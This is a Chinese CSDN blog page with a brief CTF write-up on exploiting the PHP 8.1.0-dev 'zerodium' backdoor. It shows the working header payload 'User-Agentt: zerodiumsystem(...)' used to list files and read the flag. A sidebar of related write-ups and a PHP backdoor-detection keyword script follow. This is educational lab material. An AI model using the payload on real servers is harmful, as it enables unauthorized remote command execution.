青少年CTF-PHP的后门

最新推荐文章于 2025-04-17 09:05:34 发布

M's blog

最新推荐文章于 2025-04-17 09:05:34 发布

阅读量820

点赞数 5

文章标签：青少年CTF php后门网络安全

本文链接：https://blog.youkuaiyun.com/2301_77001831/article/details/136570751

版权

打开容器后发现，就是php后门漏洞类的，

直接bp抓包，

发送给repeater,并添加代码执行，

User-Agentt:zerodiumsystem("ls /");

有线索，发现flag文件，直接进行查看。

User-Agentt:zerodiumsystem("cat /flag");

直接拿到flag。

qsnctf{499d792ca6f0481f9987477c386779cb}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

M's blog

关注关注

5
点赞
踩
13

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

青少年CTF-Web-Easy PingMe攻略

小苏

11-30

1153

分号字符，决定使用这个符号进行操作，经过这条命令可以得知本目录下还有一个文件名为【flag.php】，猜测flag就在该文件中，所以使用【1.1.1.1;这是因为他是php语言，且将flag赋值在了变量中，并没有将它进行输出！第二步：开始尝试注入，先测试是否会过滤一些字符之类的操作这里以【1.1.1.1;见怪不怪了，尝试【CTRL+U】查看源代码看看是否有什么东西出现！end：遇到命令注入的可以尝试【;前言：根据题目意思得知该题目为命令执行【命令注入】第一步：启动靶场，然后打开链接查看原型。

青少年CTF-Web-CheckMe01

zxsctf的博客

10-09

1969

半颗星的简单题，CheckMe01启动题目，并访问。

参与评论您还未登录，请先登录后发表或查看评论

2024青少年ctf擂台挑战赛round1-php的后门

weixin_71656576的博客

03-01

541

该事件是黑客利用具有git权限的账户提交了一个恶意commit，给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行，则将允许未经授权的访问者执行他们选择的代码。当发现请求特殊的HTTP头部中包含字符串zerodium时，则用eval执行User-Agent第8位字符后内容。利用该后门，攻击者可以执行任意命令，对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。使用蚁剑连接，进入虚拟终端输入 cat /flag 就得到flag了。不知道什么东西，直接开搜。

青少年CTF、PHP的后门、PHP/8.1.0-dev漏洞

weixin_69830800的博客

11-15

2315

题目利用了PHP某一开发版本的重大后门，可以利用某写东西进行代码执行。

WEB-青少年CTF-PHP的后门

最新发布

Rhein-多遗憾

04-17

756

关键跟TM狼人杀似的，这玩意通常被攻击者套了一层村民的皮，混在真正的良民中间，具有很强的隐蔽性和持久性。讲的高深一点，PHP后门是一种隐藏在正常代码中的恶意脚本，允许攻击者绕过常规认证机制远程控制服务器或窃取数据。我们尝试一下伪造Http请求头，直接调用一下PHP中的“system（）函数”传递一下我们查看目录的命令。我们得先了解一下PHP后门的原理，以后遇到类似的题目才不会手忙脚乱。常见的就这几种，了解完之后我们回归正题，来看看这道题目该怎么去做。根据题目类型得知，这道题目考察的是PHP的后门。

php ctf 后门,[SUCTF 2019]CheckIn（user.ini文件构成的php后门）

weixin_32821533的博客

03-18

261

参考博客：https://www.cnblogs.com/20175211lyz/p/11455355.html首先先来看看.user.ini文件利用.user.ini上传\隐藏后门条件：1、服务器脚本语言为PHP2、服务器使用CGI／FastCGI模式3、上传目录下要有可执行的php文件对于这道题目，已经提示了需要上传文件拿shell，上传一句话木马后提示需要上传图片，上传图片马又发现被过滤了。...

【CTF Web】XCTF GFSJ0485 simple_php Writeup（代码审计+GET请求+PHP弱类型漏洞）

HEX9CF的技术博客

05-06

583

小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。

CTF-misc工具2-CTF-Tools-masterV1.3.7

08-17

CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。使用场景: 在CTF竞赛...

青少年CTF - Misc - 上号 Wp WriteUp

zxsctf的博客

10-01

2091

发现最下方访问8000端口的网页的时候，请求了shanghao.zip，我们可以通过http对象窗口进行导出。010Editor打开，在文件末尾发现qsnctf的字眼，怀疑是某种密码。我们尝试使用steghide工具，进行解密，得到了flag.txt。平台名称：青少年CTF训练平台（原中学生CTF平台）声明：题目为平台原创，如需搬运请告知平台负责人。工具：Wireshark、steghide。文件->导出对象->http对象。下载附件，发现是一个流量包。打开后得到一个jpg图片。导出之后得到压缩包。

CTF-Tools-v1.3.5

01-24

CTF-Tools-v1.3.5

【CTF】buuctf web （四）——通过配置文件构造PHP后门

m0_52923241的博客

08-19

2005

知识点 user.ini文件构成的PHP后门 .user.ini文件它比.htaccess(分布式配置文件)用的更广，不管是nginx/apache/IIS，只要是以fastcgi(进程管理器)运行的php都可以用这个方法。 [SUCTF 2019]CheckIn 上传一个a.php文件，文件内容为<?php phpinfo();?> 提示非法后缀，将后缀php修改为jpg 提示<?被过滤了将内容变为脚本标记格式：<script language=php> phpi

CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式，得到后门的密码

serfend's blog

05-03

1977

CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式，得到后门的密码来源：https://buuoj.cn/ 内容：附件：链接：https://pan.baidu.com/s/1N2bN_TueCtuqTkNlE3tKeA?pwd=hqxm 提取码：hqxm 答案：a11.that.java5crap@flare-on.com 总体思路文件夹名字是c2，猜测是后门，故发现html文件中存在异常include 查看include的文件发现php代码解析代码发

CTF 中的 PHP 漏洞利用总结

热门推荐

重新启程

10-12

2万+

基础知识系统变量（超全局变量）在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据，是一个字典 $_GET // 获取 get 数据，是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...

PHP5.5.9整数溢出漏洞

qq_53099802的博客

05-26

2980

php5.5.9整数溢出漏洞

文件上传漏洞CTF笔记

捡糖的echo

10-12

5667

参加i春秋训练营，根据大佬写的write up，以下为过程中个人笔记访问赛题 URL, 返回包如下 HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powe...

web题解，基础知识巩固（qsnctf）

Z11762的博客

05-27

1000

shell是一个用 C 语言编写的程序，它是用户使用 Linux 的桥梁。Shell 既是一种命令语言，又是一种程序设计语言。Shell 是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。为什么要学习和使用shell？Shell属于内置的脚本，程序开发的效率非常高，依赖于功能强大的命令可以迅速地完成开发任务（批处理）语法简单，代码写起来比较轻松，简单易学。

青少年CTF——CheckIn文件上传绕过——WriteUp

Amazingsuger的博客

01-20

1066

青少年CTF-CheckIn文件上传绕过——WriteUp

PHP/8.1.0-dev 后门命令执行漏洞复现

m0_63253040的博客

09-25

1911

题目描述：题目利用了PHP某一开发版本的重大后门，可以利用某写东西进行代码执行。一开始这里我有个空格在:后面，所以执行不成功，去掉空格就成功了。没有发现什么点，目录扫描也没有结果，打开bp抓包。搜索PHP/8.1.0-dev。

青少年CTF PHP后门

03-09

### 青少年CTF竞赛中的PHP后门检测与防御 #### PHP后门概述 PHP后门是一种隐藏在服务器上的恶意脚本，通常用于未经授权访问网站或服务器资源。这些后门可能通过上传漏洞、配置错误或其他安全弱点被植入到目标环境中。 #### 常见的PHP后门特征常见的PHP后门会包含一些特定的功能来绕过常规的安全措施并执行任意代码。这包括但不限于： - 使用`eval()`, `assert()` 或者其他函数动态解析字符串作为PHP代码运行。 - 利用反序列化漏洞触发远程命令执行。 - 调用系统命令接口如`shell_exec()`, `exec()`, `passthru()` 和 `system()` 来获取操作系统级别的控制权[^1]。 #### 如何检测PHP后门为了有效识别潜在的PHP后门，可以从以下几个方面入手： ##### 文件完整性检查定期扫描项目文件夹并与已知良好状态下的副本对比，任何新增加或者修改过的可疑文件都应引起重视。可以借助工具自动化此过程，比如使用Git版本控制系统跟踪变更历史记录。 ##### 关键字匹配分析编写正则表达式模式去查找源码中存在的危险关键词汇表，例如上述提到的各种可利用于注入攻击的方法名以及它们变体形式（大小写混合等），从而快速定位风险区域。 ```php // 示例：简单的关键字匹配规则片段 $dangerous_functions = ['eval', 'assert', 'shell_exec', 'exec', 'passthru', 'system']; foreach ($files as $file) { foreach ($dangerous_functions as $func) { if (preg_match("/\b" . preg_quote($func, '/') . "\b/i", file_get_contents($file))) { echo "$file contains possible backdoor code.\n"; } } } ``` ##### 日志审查仔细查阅Web服务器和应用程序的日志文件，留意异常活动迹象，特别是那些涉及POST请求参数中含有base64编码数据或者其他非正常输入的情况。此外还要关注来自陌生IP地址频繁尝试登录的行为。 #### 加强防护策略除了积极监测外还需要采取预防性手段降低遭受入侵的概率： - **最小权限原则**：确保所有服务进程仅拥有完成其职责所需的最低限度权利；关闭不必要的端口和服务减少暴露面。 - **更新补丁及时安装**：保持软件栈处于最新稳定版能够修复大量已公开的安全隐患。 - **启用防火墙及WAF(Web Application Firewall)** ：设置合理的网络边界保护机制阻挡非法流量进入内部网段的同时过滤掉针对web应用层发起的各类威胁向量。 - **教育员工提高警惕意识**：培训相关人员掌握基本的信息安全保障常识，在日常工作中养成良好的习惯避免人为失误造成安全隐患扩大化传播。 #### 学习参考资料推荐对于希望深入研究这一主题的学习者来说，下面几项资源或许有所帮助： - OWASP官方文档提供了丰富的关于Web应用程序安全性方面的指导材料； - HackerOne平台上汇集了许多真实案例分享和技术文章有助于理解实际场景下的攻防对抗思路； - GitHub仓库中存在不少开源项目致力于开发专门用来审计PHP程序安全性的框架库可供参考借鉴。